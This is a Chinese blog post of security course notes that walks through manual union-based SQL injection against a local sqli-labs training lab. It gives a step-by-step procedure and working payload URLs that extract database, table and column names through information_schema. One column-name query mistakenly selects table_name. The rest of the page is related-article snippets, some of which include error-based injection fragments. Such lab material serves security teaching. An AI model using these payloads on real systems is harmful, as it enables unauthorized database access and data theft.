hcie第五天总结sql注入1

最新推荐文章于 2024-10-17 20:40:27 发布
最新推荐文章于 2024-10-17 20:40:27 发布
阅读量122 收藏
点赞数
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45964162/article/details/109321429
版权

sql注入操作流程
1,判断交互方式get/post/http/head。提交的数据在url显示的为get,而没有在url显示的为post。
2,判断数据库的执行语句。数据库类型不同,语句存在差异。
3,构造语句打破闭合。一般为’ ‘’ ‘) ‘’)
4,判断数据列的数量。通过排序函数order by来对某一列进行排序,不出错则含有该列,报错则没有,可以判断出列数。
5,判断页面显示位。通过联合查询union all语句将两个表合并显示在一个表中,列数要求一致。
  select * from users union all select 1,2,3 #可以将1,2,3和指定表同时显示,只要将第一个查询不显示,就能把一起显示的数据放在首行显示,一般将第一个查询设置为空即可。
6,利用显示位显示一些信息。可以用一些显示信息的函数代替显示位的数字
用database()可以显示出库名。
显示位判断
7,获取库名后,获取所有表名和相应的列名。
  select table_name from information_schema.tables wheretable_schema=‘库名’     #取表名
  select table_name from information_schema.columns where table_schema=‘库名’and table_name=‘表名’     #取列名
8,已知表和列,就可以查询到想要的数据。
实验
1,可以得知闭合类型为’
第一步
第一步2
2,可以得知只有3列
第二步1
第二步2
3,可以得知显示位只有2,3
第3步
4,可知库名为security
第四步
5,得知表名
http://192.168.29.130/sqli-labs-master/Less-1/?id=-1’ union all select 1,database(),(select table_name from information_schema.tables where table_schema=‘security’ limit 0,1)–+   #通过修改limit x,1中的x值来决定查看第几个表名,而1表示步长。
第五步
6,得知列名
http://192.168.29.130/sqli-labs-master/Less-1/?id=-1’ union all select 1,database(),(select table_name from information_schema.columns where table_schema= ‘security’ and table_name=‘users’ limit 0,1)–+
第六步
7,得到表和列后替换简单的sql语句可以查到想要的东西
select password from users limit 0,1
在这里插入图片描述

老灵了
关注
二、云计算-私有云-国产-华为-FusionCloud+HCIE Cloud相关知识点+笔试题库
stqer的博客
08-02 3259
企业IT向云化和数据智能逐步演进FusionCloud功能架构FusionCloud系统架构ManageOne在FusionCloud私有云解决方案中承担CMP(Cloud Management Platforms)的职责,通过自研和集成的方式,为企业客户提供对企业私有云资源及企业租用的公有云资源统一管理的能力,包括租户自服务界面,云产品管理和产品目录,计量,计算、存储和网络资源自动化配置,云服务和云资源的运维监控等。ManageOne在FusionCloud的位置。....................
hcie第五天总结
qq_45964162的博客
01-18 323
广域网接口,ppp,lcp,pap认证,chap认证,ncp协议,mp,pppoe以太网
HCIE(5)——浅谈sql注入
qq_45782298的博客
10-25 231
一、什么是SQL注入攻击 SQL攻击(英语:SQL injection),简称注入攻击,是发生于应用程序之数据库层的安全漏洞。简而言之,是在输入的字符串之中注入SQL指令,在设计不良的程序当中忽略了检查,那么这些注入进去的指令就会被数据库服务器误认为是正常的SQL指令而运行,因此遭到破坏或是入侵。 ...
HCIE(6)——SQL注入(报错型注入、布尔型盲注、时间型盲注)
qq_45782298的博客
11-02 612
一、报错型SQL注入 报错型SQL注入SQL注入的前三步是一致的,但是数据没有回显位,也就是说即使构造语句成功我们也没有办法看到数据的显示。但是如果SQL语句出现错误可以回显在页面上,我们就可以利用这点来构造报错显示的SQL语句。 下面是利用count(*),FLOOR(RAND(0)*2),group by报错 AND(SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(CAST(DATABASE() AS CHAR),0x7e))
HCIE网络安全第五天
qq_43518594的博客
10-27 194
浅谈SQL注入及其防御技术 什么是SQL注入 就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 SQL注入是影响企业运营最具有破坏性的漏洞之一。 应用程序向后台数据库进行SQL查询时,如果为攻击者提供了影响该查询的能力,就会引起SQL注入。 初步注入–绕过验证,直接登录 中级注入–借助异常获取信息。 危害扩大–获取服务器所有的库名、表名、字段名 最终目的–获取数据库中的数据 SQL注入不仅能通过输入框,还能通过Url达到目的。 除了服务器错
HCIE网络安全第六天
qq_43518594的博客
11-01 343
SQL注入 1、测试交互方法,判断浏览器提交数据和web服务器的交互方式。 get提交 提交的数据在URL中显示 post提交 没有在URL中显示 2、判断提交变量的数据类型 整形 id=1 and 1=2 //让提交数据为False(假) 有交互数据显示则为整形,否则为str 字符型 id=1 and 1=2 无交互显示,则进一步判断闭合方式 常见的闭合方式 ‘’ “” () (’’) ("")等 3、构造闭合(整形不需要) id=1’ 例如是’
誉天华为HCIE-Security 2.0 直通车课程大纲
11-09 1052
2019年我国网络安全市场规模达到680亿元,同比增长25%。随着对网络安全的愈加重视及布局,市场规模将持续扩大,预计到2021年中国网络安全市场规模将达千亿元。 近年来,安全产品国产化趋势明显,在众多五花八门的安全厂商的技术中,我们为什么要选择华为HCIE-Security课程,3张图片告诉你华为安全HCIE-Security课程价值所在。 根据安全人才技术需要,誉天联合互联网金融行业安全资深专家,专门开发出攻防渗透课程模块,对目前常见的WEB攻击,SQL注入攻击,APT攻击进行原理讲解以及攻击过程还
华为认证云计算专家(HCIE-Cloud Computing)--练习题
ak4777t的博客
01-15 1456
华为认证云计算专家(HCIE-Cloud Computing)--练习题
HCIE-灾备技术和安全服务
ma1782072的博客
11-12 529
云服务器备份和云硬盘备份,他们的实质是一样的。ECS001(默认有个系统盘EVS,EVS就是云硬盘),所以在备份云服务器ECS001的时候,实质就是备份了系统盘,只不过云服务器可能会挂载多个云硬盘(1,2,3),那么在针对云服务器备份的时候,默认会把(1,2,3)ECS对应的所有磁盘全部备份,当然也可以手工选择单独备份哪个硬盘。备份:在华为产品里面,所有备份特指物理备份,备份的是底层数据快。注意:华为备份是这样的,第一次备份全部是“全量备份”,从第二次开始及以后备份,默认全部都是“增量备份”。
HCIE安全笔试-H12-731 V2.0填空题
lyhbwwk的博客
06-03 1425
HCIE安全笔试-H12-721填空题
HCIE-DC 面试总结.docx
02-27
"HCIE-DC 面试总结" 本文档总结HCIE-DC 面试的主要内容,涵盖了 M-LAG 技术原理、CSS 堆叠与 M-LAG 的区别、传统主流存储技术介绍、FusionStorage 组件及架构介绍、云网一体化整体架构、openstack 资源相关内容...
HCIE第五天总结
weixin_47949764的博客
07-17 240
WAN技术 一、 广域网接口 1.路由广域网接口演进 2.Etheret 接口 以太网由 Xerox(施乐)公司 PARC 研究中心于 1973 年 5 月 22 日首次提 出。 以太网类型: 10M 以太网(标准以太网) 100M 以太网(快速以太网) 1000M 以太网(千兆以太网) 10G 以太网(万兆以太网) 100G 以太网( 100G 以太网) …… 3.POS 接口 Packet Over SONET/SDH :在 SONET/SDH 上承载 P 包或其他数据包的传 输技术。 POS 将长度可
hcie第七天总结
qq_45964162的博客
01-21 763
ospf防环
SQL调优指南及高级SQL技巧
Hellc007的博客
10-14 1044
SQL调优是一个复杂的任务,需要对数据库结构、索引设计、查询逻辑、事务管理等多个方面的深入理解。通过运用上述高级技巧和应对实战问题的策略,可以有效提高SQL查询的性能,优化数据库的整体表现。希望这篇文章能为你的添彩。
PostgreSQL学习笔记:PostgreSQL vs MySQL
软件行业技术文化交流。
10-15 1188
综上所述,PostgreSQL 和 MySQL 各有优缺点,选择哪种数据库取决于具体的应用场景和需求。如果需要处理复杂的数据类型、强大的事务支持和高级的查询功能,PostgreSQL 可能是更好的选择。如果对写入性能和简单易用性有较高要求,MySQL 可能更适合。在实际应用中,可以根据具体情况进行评估和测试,选择最适合的数据库管理系统。两者都有商业公司提供支持服务。例如,MySQL 有 Oracle 公司的商业支持,PostgreSQL 有多家公司提供专业的支持和服务。
Spring MessageSource国际化原理
最新发布
xsgnzb的专栏
10-17 987
查找code的过程。遍历basenames找到对应的资源文件// 没有变量的情况if (bundle!= null) {// 有变量的情况,使用MessageFormat对变量进行替换if (bundle!= null) {= null) {获得ResourceBundle= null) {try {// ...
sql server删除过期备份文件脚本
Winter_Sun灬的博客
10-14 469
删除sql server数据库备份文件脚本
CTE 与存储过程:SQL 查询简化与复杂业务逻辑处理的最佳选择
nbsaas-boot基于Request-Response的企业级快速开发框架
10-17 1004
CTE(Common Table Expression,公共表表达式)和存储过程是两种不同的SQL工具,分别用于解决不同的问题。它们各有优缺点,适用于不同的场景。让我们从以下几个方面来比较它们:CTE:存储过程:CTE:存储过程:CTE:存储过程:CTE:存储过程:总结
【力扣 | SQL题 | 每日4题】力扣2308,2324,2346,2372
2301_80912559的博客
10-16 1195
4 mid,还是比较常规的。
"HCIE_Cloud面试题及虚拟化技术总结
本文主要总结HCIE_Cloud的面试题,其中涉及到了服务器虚拟化、云计算、内存虚拟化和存储虚拟化等相关内容。 第一章介绍了服务器虚拟化。服务器虚拟化是一种将一台物理服务器划分为多个虚拟服务器的技术,可以提高...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值